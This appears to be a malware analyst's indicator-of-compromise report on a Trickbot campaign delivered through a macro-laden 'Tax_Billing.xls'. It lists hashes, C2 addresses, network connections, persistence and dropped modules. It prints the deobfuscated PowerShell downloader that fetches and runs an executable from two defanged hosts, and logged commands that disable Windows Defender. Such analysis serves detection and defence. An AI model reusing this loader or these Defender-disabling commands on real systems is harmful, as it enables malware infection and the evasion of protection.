#trickbot_060219

1. #IOC #OptiData #VR #Trickbot #X97M #macro #powershell #obfuscated
2.  
3. https://pastebin.com/70KhU3a4
4.  
5. previous contact:
6. 05/10/18 https://pastebin.com/75KNqwCf
7. 02/10/18 https://pastebin.com/fm5Ug69G
8. 24/09/18 https://pastebin.com/LjuNyGfn
9.  
10. FAQ:
11. https://myonlinesecurity.co.uk/trickbot-via-fake-deloitte-canada-tax-billing/
12. https://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/
13. https://radetskiy.wordpress.com/?s=trickbot
14.  
15. attack_vector
16. --------------
17. email attach .xls > macro > cmd > powershell > GET 2 URL > $env:temp+'\tmp1806.exe
18.  
19. email_headers
20. --------------
21. n/a
22.  
23. files
24. --------------
25. SHA-256 2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce
26. File name Tax_Billing.xls [Composite Document File V2 Document] Type: OLE, AutoExec
27. File size 57.5 KB
28.  
29. SHA-256 1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a
30. File name pro.smoc > tmp1806.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
31. File size 313.64 KB
32.  
33. activity
34. **************
35.  
36. deobfuscating_macro
37. --------------
38. cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));
39. IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
40. '""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
41.  
42. @>
43.  
44. powershell "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));
45. (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
46.  
47. @>
48.  
49. function <#release#> TurnOn([string] $pch1){$tuc1=1;try{[System.Net.ServicePointManager]::ServerCertificateVal
50. idationCallback={$true};(new-object system.net.webclient <#exim#> ).downloadfile($pch1,$env:temp+'\tmp1806.exe
51. ');}catch{$tuc1=0;}return $tuc1;}$fne1=@('jumpuprecords{.} com/pro.smoc','beersforgears{.} com/pro.smoc');foreach ($
52. riw in $fne1){if(TurnOn('https://'+$riw) -eq 1){break;} };<#validate#>start-process ($env:temp+'\tmp1806.exe')
53.  
54. pl_src: 2
55. --------------
56. 69.27.37.10 jumpuprecords{.} com 404
57. 192.254.185.228 beersforgears{.} com 404
58.  
59. C2:
60. --------------
61. 190.186.39.82
62.  
63. netwrk
64. --------------
65. ssl
66. 69.27.37.10 jumpuprecords{.} com Client Hello
67. 192.254.185.228 beersforgears{.} com Client Hello
68.  
69. http.request.method == POST
70. 190.186.39.82 190.186.39.82 POST /ser0205us/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (!)
71. 190.186.39.82 190.186.39.82:8082 POST /ser0205us/APM11_W617601.id/90 HTTP/1.1 test (!)
72.  
73. comp
74. --------------
75. powershell.exe 1780 TCP 69.27.37.10 443 ESTABLISHED
76. powershell.exe 1780 TCP 192.254.185.228 443 SYN_SENT
77. svchost.exe 1504 TCP 46.21.249.220 443 ESTABLISHED
78. svchost.exe 1504 TCP 2.21.243.40 80 ESTABLISHED
79. svchost.exe 1504 TCP 47.52.62.55 443 SYN_SENT
80. svchost.exe 1504 TCP 89.46.223.121 447 ESTABLISHED
81.  
82. svchost.exe 1504 TCP zimbabweemergencyassistance{.} com https ESTABLISHED
83. svchost.exe 1504 TCP a2-21-243-40.deploy.static.akamaitechnologies{.} com http ESTABLISHED
84.  
85. proc
86. --------------
87. C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE /e
88. C:\Windows\SysWOW64\cmd.exe /c powershell "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath %tmp%\tmp9388.bat -encoding ascii; cmd /c '%tmp%\tmp9388.bat'
89. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "'powershell ""$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''... Base64 string ...''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'""| out-file -filepath C:\tmp\tmp9388.bat -encoding ascii; cmd /c 'C:\tmp\tmp9388.bat'
90. C:\Windows\SysWOW64\cmd.exe /c C:\tmp\tmp9388.bat
91. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('... Base64 string ...'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
92. @>
93. C:\tmp\tmp1806.exe
94. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
95. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
96. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
97. @>
98. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
99. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
100. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
101. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
102. @>
103. C:\Windows\system32\svchost.exe
104. @>
105. C:\Windows\system32\svchost.exe -k netsvcs
106. C:\Windows\system32\taskeng.exe {BBC0F265-32F9-4766-909F-D34E8EEF3FFB} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
107. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
108. C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend
109. C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend
110. C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
111. C:\Windows\system32\svchost.exe
112.  
113. persist
114. --------------
115. Task Scheduler
116. \CleanMemoryWinTask c:\users\operator\appdata\roaming\cleanmem\tnq1907.exe 06.02.2019 16:55
117.  
118. drop
119. --------------
120. C:\Users\operator\AppData\Roaming\cleanmem\grabber_temp.INTEG.RAW
121. C:\Users\operator\AppData\Roaming\cleanmem\tmp.edb
122. C:\Users\operator\AppData\Roaming\cleanmem\tnq1907.exe
123. C:\Users\operator\AppData\Roaming\cleanmem\vlc-qt-interface.ini
124. C:\Users\operator\AppData\Roaming\cleanmem\injectDll64_configs
125. C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64_configs
126. C:\Users\operator\AppData\Roaming\cleanmem\networkDll64_configs
127. C:\Users\operator\AppData\Roaming\cleanmem\psfin64_configs
128. C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64_configs
129. C:\Users\operator\AppData\Roaming\cleanmem\importDll64
130. C:\Users\operator\AppData\Roaming\cleanmem\injectDll64
131. C:\Users\operator\AppData\Roaming\cleanmem\mailsearcher64
132. C:\Users\operator\AppData\Roaming\cleanmem\networkDll64
133. C:\Users\operator\AppData\Roaming\cleanmem\psfin64
134. C:\Users\operator\AppData\Roaming\cleanmem\pwgrab64
135. C:\Users\operator\AppData\Roaming\cleanmem\shareDll64
136. C:\Users\operator\AppData\Roaming\cleanmem\systeminfo64
137. C:\Users\operator\AppData\Roaming\cleanmem\wormwinDll64
138.  
139. # # #
140. https://www.virustotal.com/#/file/2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce/details
141. https://www.virustotal.com/#/url/240554f90c39c2c914803a8ee2c295d5c848482f82138d20a236d6b71b2c823c/details
142. https://www.virustotal.com/#/url/0b963e7eb53d1d7cbca89b53b376530a92abb5bf7a5fff97f100a0545545b34d/details
143. https://urlhaus.abuse.ch/url/118629/
144. https://urlhaus.abuse.ch/url/118628/
145.  
146. https://www.virustotal.com/#/file/1595ecbc00303503b974747aff928d2eacce9b249e0def2ea29ee12191cc6f1a/details
147. https://analyze.intezer.com/#/analyses/66286e3c-deca-480c-9f36-caebee871a10
148.  
149. VR
150.  
151. @